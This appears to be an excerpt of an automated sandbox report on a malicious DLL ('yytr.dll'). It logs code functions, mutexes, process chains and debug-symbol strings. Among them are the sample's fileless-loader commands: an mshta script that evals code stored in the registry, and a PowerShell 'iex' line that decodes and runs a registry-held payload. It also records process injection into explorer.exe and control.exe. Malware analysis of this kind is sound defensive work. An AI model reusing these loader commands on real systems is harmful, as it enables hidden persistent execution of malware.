Source: C:\Windows\System32\control.exe | Code function: 38_2_00124B24 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, | 38_2_00124B24 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_0012FF54 NtReadVirtualMemory, | 38_2_0012FF54 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_0014A002 NtProtectVirtualMemory,NtProtectVirtualMemory, | 38_2_0014A002 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0044281C | 0_2_0044281C |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00433840 | 0_2_00433840 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02C920A4 | 0_2_02C920A4 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02F323FC | 0_2_02F323FC |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02F3936B | 0_2_02F3936B |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_0044281C | 1_2_0044281C |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00433840 | 1_2_00433840 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_045420A4 | 1_2_045420A4 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_04521618 | 1_2_04521618 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DC0CDC | 37_2_04DC0CDC |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DBA0C4 | 37_2_04DBA0C4 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DA58FC | 37_2_04DA58FC |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DB2080 | 37_2_04DB2080 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DAA8B8 | 37_2_04DAA8B8 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DB059C | 37_2_04DB059C |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DBE178 | 37_2_04DBE178 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DB3520 | 37_2_04DB3520 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DC36F4 | 37_2_04DC36F4 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DBAE94 | 37_2_04DBAE94 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DA16B4 | 37_2_04DA16B4 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DA7A0C | 37_2_04DA7A0C |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DB537C | 37_2_04DB537C |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DAEF1C | 37_2_04DAEF1C |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DC40F8 | 37_2_04DC40F8 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DA3088 | 37_2_04DA3088 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DBE87C | 37_2_04DBE87C |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DC5010 | 37_2_04DC5010 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DA4828 | 37_2_04DA4828 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DC2994 | 37_2_04DC2994 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DAD590 | 37_2_04DAD590 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DB154C | 37_2_04DB154C |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DAB170 | 37_2_04DAB170 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DA6168 | 37_2_04DA6168 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DADD18 | 37_2_04DADD18 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DAAD03 | 37_2_04DAAD03 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DB8504 | 37_2_04DB8504 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DB0134 | 37_2_04DB0134 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DA66D0 | 37_2_04DA66D0 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DA1AD0 | 37_2_04DA1AD0 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DB6E88 | 37_2_04DB6E88 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DC1A30 | 37_2_04DC1A30 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DABF6C | 37_2_04DABF6C |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DAB730 | 37_2_04DAB730 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DB3F2C | 37_2_04DB3F2C |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DACF24 | 37_2_04DACF24 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_00130CDC | 38_2_00130CDC |
Source: C:\Windows\System32\control.exe | Code function: 38_2_0012059C | 38_2_0012059C |
Source: C:\Windows\System32\control.exe | Code function: 38_2_0011EF1C | 38_2_0011EF1C |
Source: C:\Windows\System32\control.exe | Code function: 38_2_00135010 | 38_2_00135010 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_00114828 | 38_2_00114828 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_0012E87C | 38_2_0012E87C |
Source: C:\Windows\System32\control.exe | Code function: 38_2_00122080 | 38_2_00122080 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_00113088 | 38_2_00113088 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_0011A8B8 | 38_2_0011A8B8 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_0012A0C4 | 38_2_0012A0C4 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_001340F8 | 38_2_001340F8 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_001158FC | 38_2_001158FC |
Source: C:\Windows\System32\control.exe | Code function: 38_2_0011DD18 | 38_2_0011DD18 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_0011AD03 | 38_2_0011AD03 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_00128504 | 38_2_00128504 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_00120134 | 38_2_00120134 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_00123520 | 38_2_00123520 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_0012154C | 38_2_0012154C |
Source: C:\Windows\System32\control.exe | Code function: 38_2_0011B170 | 38_2_0011B170 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_0012E178 | 38_2_0012E178 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_00116168 | 38_2_00116168 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_0011D590 | 38_2_0011D590 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_00132994 | 38_2_00132994 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_00117A0C | 38_2_00117A0C |
Source: C:\Windows\System32\control.exe | Code function: 38_2_00131A30 | 38_2_00131A30 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_0012AE94 | 38_2_0012AE94 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_00126E88 | 38_2_00126E88 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_001116B4 | 38_2_001116B4 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_00111AD0 | 38_2_00111AD0 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_001166D0 | 38_2_001166D0 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_001336F4 | 38_2_001336F4 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_0011B730 | 38_2_0011B730 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_0011CF24 | 38_2_0011CF24 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_00123F2C | 38_2_00123F2C |
Source: C:\Windows\System32\control.exe | Code function: 38_2_0012537C | 38_2_0012537C |
Source: C:\Windows\System32\loaddll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{305FBD52-CFE8-E23F-D964-73361DD857CA} |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_01 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{7C7FA6C6-ABD4-0EE2-1570-0F2219A4B376} |
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4576 |
Source: C:\Windows\System32\control.exe | Mutant created: \Sessions\1\BaseNamedObjects\{8C972E34-7B6D-9E84-6580-DFB269B48306} |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll |
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\yytr.dll' | |
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\yytr.dll',#1 | |
Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4576 -s 756 | |
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding | |
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6556 CREDAT:17410 /prefetch:2 | |
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding | |
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5988 CREDAT:17410 /prefetch:2 | |
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding | |
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:17410 /prefetch:2 | |
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:82956 /prefetch:2 | |
Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>' | |
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)) | |
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline' | |
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC08.tmp' 'c:\Users\user\AppData\Local\Temp\qxfma03s\CSC9A61D8937933426B894F97C05C536C75.TMP' | |
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.cmdline' | |
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDFCF.tmp' 'c:\Users\user\AppData\Local\Temp\maejgtwh\CSC5E7D34BFE3B047248BD36616B57FD91.TMP' | |
Source: unknown | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h | |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\yytr.dll',#1 | Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h | Jump to behavior |
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6556 CREDAT:17410 /prefetch:2 | Jump to behavior |
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5988 CREDAT:17410 /prefetch:2 | Jump to behavior |
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:17410 /prefetch:2 | Jump to behavior |
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:82956 /prefetch:2 | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)) | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline' | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.cmdline' | |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC08.tmp' 'c:\Users\user\AppData\Local\Temp\qxfma03s\CSC9A61D8937933426B894F97C05C536C75.TMP' | |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDFCF.tmp' 'c:\Users\user\AppData\Local\Temp\maejgtwh\CSC5E7D34BFE3B047248BD36616B57FD91.TMP' | |
Source: C:\Windows\explorer.exe | Process created: unknown unknown | |
Source: C:\Windows\explorer.exe | Process created: unknown unknown | |
Source: C:\Windows\explorer.exe | Process created: unknown unknown | |
Source: C:\Windows\explorer.exe | Process created: unknown unknown | |
Source: C:\Windows\explorer.exe | Process created: unknown unknown | |
Source: C:\Windows\explorer.exe | Process created: unknown unknown | |
Source: C:\Windows\explorer.exe | Process created: unknown unknown | |
Source: C:\Windows\explorer.exe | Process created: unknown unknown | |
Source: C:\Windows\explorer.exe | Process created: unknown unknown | |
Source: C:\Windows\explorer.exe | Process created: unknown unknown | |
Source: C:\Windows\explorer.exe | Process created: unknown unknown | |
Source: C:\Windows\explorer.exe | Process created: unknown unknown | |
Source: C:\Windows\explorer.exe | Process created: unknown unknown | |
Source: C:\Windows\explorer.exe | Process created: unknown unknown | |
Source: C:\Windows\explorer.exe | Process created: unknown unknown | |
Source: C:\Windows\explorer.exe | Process created: unknown unknown | |
Source: C:\Windows\explorer.exe | Process created: unknown unknown | |
Source: C:\Windows\System32\control.exe | Process created: unknown unknown | |
Source: | Binary string: powrprof.pdbG source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: wkernel32.pdb source: WerFault.exe, 00000004.00000003.646924434.0000000003165000.00000004.00000001.sdmp |
Source: | Binary string: 7C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.pdb source: powershell.exe, 0000001E.00000002.910551161.0000026F5EBFA000.00000004.00000001.sdmp |
Source: | Binary string: bcrypt.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: sfc_os.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: ucrtbase.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: version.pdb{ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: msvcrt.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp |
Source: | Binary string: wrpcrt4.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: wntdll.pdb source: WerFault.exe, 00000004.00000003.646920068.000000000315F000.00000004.00000001.sdmp |
Source: | Binary string: wimm32.pdb} source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: shcore.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: combase.pdbQ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: wgdi32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp |
Source: | Binary string: advapi32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: fltLib.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: wsspicli.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: shell32.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: msvcp_win.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000021.00000002.845354069.000001CB4A4D0000.00000002.00000001.sdmp, csc.exe, 00000023.00000002.855076730.000002D3EE650000.00000002.00000001.sdmp |
Source: | Binary string: msvcp_win.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: fltLib.pdbM source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: wkernelbase.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp |
Source: | Binary string: wimm32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: shlwapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: mpr.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: wwin32u.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp |
Source: | Binary string: setupapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: iphlpapi.pdbe source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: imagehlp.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: wUxTheme.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: dwmapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: wntdll.pdb( source: WerFault.exe, 00000004.00000003.646920068.000000000315F000.00000004.00000001.sdmp |
Source: | Binary string: shcore.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: profapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: winspool.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: wgdi32full.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp |
Source: | Binary string: shell32.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: oleaut32.pdbc source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: sechost.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: iphlpapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: 7C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.pdbXPS source: powershell.exe, 0000001E.00000002.910551161.0000026F5EBFA000.00000004.00000001.sdmp |
Source: | Binary string: propsys.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.863977808.0000000005670000.00000004.00000001.sdmp |
Source: | Binary string: bcrypt.pdb_ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: ucrtbase.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: powrprof.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: msctf.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: ole32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: version.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: AcLayers.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp |
Source: | Binary string: wsspicli.pdbi source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: sfc_os.pdbGX source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: dwmapi.pdbm source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: 7C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.pdbXPS source: powershell.exe, 0000001E.00000002.910665056.0000026F5EC2E000.00000004.00000001.sdmp |
Source: | Binary string: sechost.pdbw source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: shlwapi.pdbK source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: 7C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.pdb source: powershell.exe, 0000001E.00000002.910375555.0000026F5EBB6000.00000004.00000001.sdmp |
Source: | Binary string: cryptbase.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: comctl32v582.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: wkernelbase.pdb( source: WerFault.exe, 00000004.00000003.647057880.000000000316B000.00000004.00000001.sdmp |
Source: | Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: cfgmgr32.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.863977808.0000000005670000.00000004.00000001.sdmp |
Source: | Binary string: combase.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: Windows.Storage.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: wkernel32.pdb( source: WerFault.exe, 00000004.00000003.646924434.0000000003165000.00000004.00000001.sdmp |
Source: | Binary string: rundll32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp |
Source: | Binary string: oleaut32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: sfc.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: apphelp.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp |
Source: | Binary string: wuser32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp |
Source: | Binary string: comctl32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0042743C LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_0042743C |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00453E60 push 00453EEDh; ret | 0_2_00453EE5 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00406040 push 0040606Ch; ret | 0_2_00406064 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_004160F0 push ecx; mov dword ptr [esp], edx | 0_2_004160F5 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00418174 push ecx; mov dword ptr [esp], ecx | 0_2_00418179 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00414104 push 00414151h; ret | 0_2_00414149 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00416134 push ecx; mov dword ptr [esp], edx | 0_2_00416139 |
